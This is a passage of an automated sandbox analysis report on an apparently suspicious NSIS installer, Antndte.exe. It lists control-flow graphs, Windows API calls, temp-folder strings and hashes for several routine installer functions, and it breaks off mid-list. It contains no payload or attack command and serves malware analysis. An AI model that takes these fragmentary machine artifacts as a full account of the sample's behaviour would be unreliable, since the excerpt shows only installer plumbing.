                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 717251189-1238663416
                                                                                                                                • Opcode ID: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                                                                • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                                                                                                • Opcode Fuzzy Hash: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                                                                • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 763 40176f-401794 call 402c37 call 405bca 768 401796-40179c call 406282 763->768 769 40179e-4017b0 call 406282 call 405b53 lstrcatW 763->769 774 4017b5-4017b6 call 406516 768->774 769->774 778 4017bb-4017bf 774->778 779 4017c1-4017cb call 4065c5 778->779 780 4017f2-4017f5 778->780 787 4017dd-4017ef 779->787 788 4017cd-4017db CompareFileTime 779->788 782 4017f7-4017f8 call 405d4f 780->782 783 4017fd-401819 call 405d74 780->783 782->783 790 40181b-40181e 783->790 791 40188d-4018b6 call 4052e6 call 4030fa 783->791 787->780 788->787 793 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 790->793 794 40186f-401879 call 4052e6 790->794 805 4018b8-4018bc 791->805 806 4018be-4018ca SetFileTime 791->806 793->778 826 401864-401865 793->826 803 401882-401888 794->803 807 402ac8 803->807 805->806 809 4018d0-4018db CloseHandle 805->809 806->809 813 402aca-402ace 807->813 811 4018e1-4018e4 809->811 812 402abf-402ac2 809->812 815 4018e6-4018f7 call 4062a4 lstrcatW 811->815 816 4018f9-4018fc call 4062a4 811->816 812->807 822 401901-4022f6 call 4058e4 815->822 816->822 822->813 826->803 828 401867-401868 826->828 828->794
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Undige\trivant,?,?,00000031), ref: 004017D5
                                                                                                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Undige\trivant$C:\Users\user\AppData\Local\Temp\nsm118D.tmp$C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll$Call
                                                                                                                                • API String ID: 1941528284-2182250748
                                                                                                                                • Opcode ID: 4d409e155a61ffd0ac71ab5cd1aa4f2a7c0b45529f7f932e188af2d6c0b8514a
                                                                                                                                • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                                                                                                • Opcode Fuzzy Hash: 4d409e155a61ffd0ac71ab5cd1aa4f2a7c0b45529f7f932e188af2d6c0b8514a
                                                                                                                                • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004052E6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 829 4052e6-4052fb 830 405301-405312 829->830 831 4053b2-4053b6 829->831 832 405314-405318 call 4062a4 830->832 833 40531d-405329 lstrlenW 830->833 832->833 834 405346-40534a 833->834 835 40532b-40533b lstrlenW 833->835 838 405359-40535d 834->838 839 40534c-405353 SetWindowTextW 834->839 835->831 837 40533d-405341 lstrcatW 835->837 837->834 840 4053a3-4053a5 838->840 841 40535f-4053a1 SendMessageW * 3 838->841 839->838 840->831 842 4053a7-4053aa 840->842 841->840 842->831
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                • lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll
                                                                                                                                • API String ID: 2531174081-4105306982
                                                                                                                                • Opcode ID: 1a26142181a7b7966a479fe8b98f583e8404c83a3c6630b706bedea1a7a6ef4c
                                                                                                                                • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                                                                                                • Opcode Fuzzy Hash: 1a26142181a7b7966a479fe8b98f583e8404c83a3c6630b706bedea1a7a6ef4c
                                                                                                                                • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004030FA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 843 4030fa-403111 844 403113 843->844 845 40311a-403123 843->845 844->845 846 403125 845->846 847 40312c-403131 845->847 846->847 848 403141-40314e call 403315 847->848 849 403133-40313c call 40332b 847->849 853 403303 848->853 854 403154-403158 848->854 849->848 855 403305-403306 853->855 856 4032ae-4032b0 854->856 857 40315e-4031a7 GetTickCount 854->857 860 40330e-403312 855->860 858 4032f0-4032f3 856->858 859 4032b2-4032b5 856->859 861 40330b 857->861 862 4031ad-4031b5 857->862 863 4032f5 858->863 864 4032f8-403301 call 403315 858->864 859->861 865 4032b7 859->865 861->860 866 4031b7 862->866 867 4031ba-4031c8 call 403315 862->867 863->864 864->853 877 403308 864->877 870 4032ba-4032c0 865->870 866->867 867->853 876 4031ce-4031d7 867->876 873 4032c2 870->873 874 4032c4-4032d2 call 403315 870->874 873->874 874->853 880 4032d4-4032e0 call 405e26 874->880 879 4031dd-4031fd call 4067bd 876->879 877->861 885 403203-403216 GetTickCount 879->885 886 4032a6-4032a8 879->886 887 4032e2-4032ec 880->887 888 4032aa-4032ac 880->888 889 403261-403263 885->889 890 403218-403220 885->890 886->855 887->870 891 4032ee 887->891 888->855 894 403265-403269 889->894 895 40329a-40329e 889->895 892 403222-403226 890->892 893 403228-403259 MulDiv wsprintfW call 4052e6 890->893 891->861 892->889 892->893 902 40325e 893->902 898 403280-40328b 894->898 899 40326b-403272 call 405e26 894->899 895->862 896 4032a4 895->896 896->861 901 40328e-403292 898->901 903 403277-403279 899->903 901->879 904 403298 901->904 902->889 903->888 905 40327b-40327e 903->905 904->861 905->901
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                • String ID: ... %d%%$FrA$@
                                                                                                                                • API String ID: 551687249-1685835555
                                                                                                                                • Opcode ID: fa428586d8a6a90e4accb04ec4ef31d1832220652243a3ff45f3bb3262e384a0
                                                                                                                                • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                                                                                                • Opcode Fuzzy Hash: fa428586d8a6a90e4accb04ec4ef31d1832220652243a3ff45f3bb3262e384a0
                                                                                                                                • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 906 4065ec-40660c GetSystemDirectoryW 907 406610-406612 906->907 908 40660e 906->908 909 406623-406625 907->909 910 406614-40661d 907->910 908->907 912 406626-406659 wsprintfW LoadLibraryExW 909->912 910->909 911 40661f-406621 910->911 911->912
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                                                                • wsprintfW.USER32 ref: 0040663E
                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                                                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 913 4057b5-405800 CreateDirectoryW 914 405802-405804 913->914 915 405806-405813 GetLastError 913->915 916 40582d-40582f 914->916 915->916 917 405815-405829 SetFileSecurityW 915->917 917->914 918 40582b GetLastError 917->918 918->916
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                                                                • GetLastError.KERNEL32 ref: 0040580C
                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                                                                                                • GetLastError.KERNEL32 ref: 0040582B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 3449924974-3370423016
                                                                                                                                • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                                                                                                • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 919 405da3-405daf 920 405db0-405de4 GetTickCount GetTempFileNameW 919->920 921 405df3-405df5 920->921 922 405de6-405de8 920->922 923 405ded-405df0 921->923 922->920 924 405dea 922->924 924->923
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405DC1
                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Antndte.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF), ref: 00405DDC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                • API String ID: 1716503409-2524661860
                                                                                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                                                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 925 10001759-10001795 call 10001b18 929 100018a6-100018a8 925->929 930 1000179b-1000179f 925->930 931 100017a1-100017a7 call 10002286 930->931 932 100017a8-100017b5 call 100022d0 930->932 931->932 937 100017e5-100017ec 932->937 938 100017b7-100017bc 932->938 941 1000180c-10001810 937->941 942 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 937->942 939 100017d7-100017da 938->939 940 100017be-100017bf 938->940 939->937 948 100017dc-100017dd call 10002b57 939->948 944 100017c1-100017c2 940->944 945 100017c7-100017c8 call 1000289c 940->945 946 10001812-1000184c call 100015b4 call 100024a4 941->946 947 1000184e-10001854 call 100024a4 941->947 966 10001855-10001859 942->966 950 100017c4-100017c5 944->950 951 100017cf-100017d5 call 10002640 944->951 957 100017cd 945->957 946->966 947->966 960 100017e2 948->960 950->937 950->945 965 100017e4 951->965 957->960 960->965 965->937 967 10001896-1000189d 966->967 968 1000185b-10001869 call 10002467 966->968 967->929 973 1000189f-100018a0 GlobalFree 967->973 975 10001881-10001888 968->975 976 1000186b-1000186e 968->976 973->929 975->967 978 1000188a-10001895 call 1000153d 975->978 976->975 977 10001870-10001878 976->977 977->975 979 1000187a-1000187b FreeLibrary 977->979 978->967 979->975
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                                                                  • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1791698881-3916222277
                                                                                                                                • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                                • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                                                                • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                                • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 982 401c19-401c39 call 402c15 * 2 987 401c45-401c49 982->987 988 401c3b-401c42 call 402c37 982->988 990 401c55-401c5b 987->990 991 401c4b-401c52 call 402c37 987->991 988->987 992 401ca9-401cd3 call 402c37 * 2 FindWindowExW 990->992 993 401c5d-401c79 call 402c15 * 2 990->993 991->990 1007 401cd9 992->1007 1005 401c99-401ca7 SendMessageW 993->1005 1006 401c7b-401c97 SendMessageTimeoutW 993->1006 1005->1007 1008 401cdc-401cdf 1006->1008 1007->1008 1009 401ce5 1008->1009 1010 402abf-402ace 1008->1010 1009->1010
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
